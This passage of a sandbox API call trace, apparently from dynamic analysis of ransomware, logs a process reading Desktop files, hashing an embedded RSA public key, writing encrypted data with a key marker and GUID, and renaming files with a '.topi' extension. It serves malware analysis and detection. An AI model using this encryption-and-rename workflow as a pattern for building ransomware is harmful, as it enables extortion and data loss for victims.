dwFlags=0x0, lpMem=0x99d9000 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fe8 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3928 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.441] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0xb661, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0xb661, lpOverlapped=0x0) returned 1 [0094.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.442] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xb666, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.442] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.442] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0094.442] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.442] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0094.442] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.442] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.442] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.442] CloseHandle (hObject=0x6a8) returned 1 [0094.443] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0094.443] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0094.443] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0094.443] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fgRRfm56VFVs.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fgrrfm56vfvs.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fgRRfm56VFVs.avi.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fgrrfm56vfvs.avi.topi")) returned 1 [0094.444] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.444] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.444] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.445] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.445] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee507c0, ftCreationTime.dwHighDateTime=0x1d5c282, ftLastAccessTime.dwLowDateTime=0x581662a0, ftLastAccessTime.dwHighDateTime=0x1d5c272, ftLastWriteTime.dwLowDateTime=0x581662a0, ftLastWriteTime.dwHighDateTime=0x1d5c272, nFileSizeHigh=0x0, nFileSizeLow=0x168bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G1XIoiutIi.mp3", cAlternateFileName="G1XIOI~1.MP3")) returned 1 [0094.445] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.445] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.445] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.446] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G1XIoiutIi.mp3") returned=".mp3" [0094.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G1XIoiutIi.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g1xioiutii.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.446] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=92347) returned 1 [0094.446] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.452] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x16895, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.452] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.453] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.453] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x168bb, lpOverlapped=0x0) returned 1 [0094.453] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.453] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.453] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.453] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.454] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.454] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.454] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.455] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.455] GetLastError () returned 0x0 [0094.455] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.455] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.455] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.455] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.455] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x168c0) returned 0x9a06a00 [0094.457] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3928 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fe8 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3730 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9000 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9030 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9048 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.458] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9030 | out: hHeap=0x680000) returned 1 [0094.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9048 | out: hHeap=0x680000) returned 1 [0094.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9048 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9030 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9048 | out: hHeap=0x680000) returned 1 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9030 | out: hHeap=0x680000) returned 1 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.459] GetCurrentThreadId () returned 0x8c4 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1820 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.459] GetCurrentThreadId () returned 0x8c4 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.460] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.460] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9030 [0094.460] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.460] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9048 [0094.460] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.460] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9018 [0094.460] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.461] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.461] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.461] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.461] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.461] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.461] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9060 [0094.461] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.461] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0094.461] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.461] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.461] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.461] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.461] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.461] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.461] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9030 | out: hHeap=0x680000) returned 1 [0094.461] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9030 [0094.461] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.461] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.461] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.462] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.462] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.462] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.462] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9030 | out: hHeap=0x680000) returned 1 [0094.462] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x320fab0 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.462] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.462] 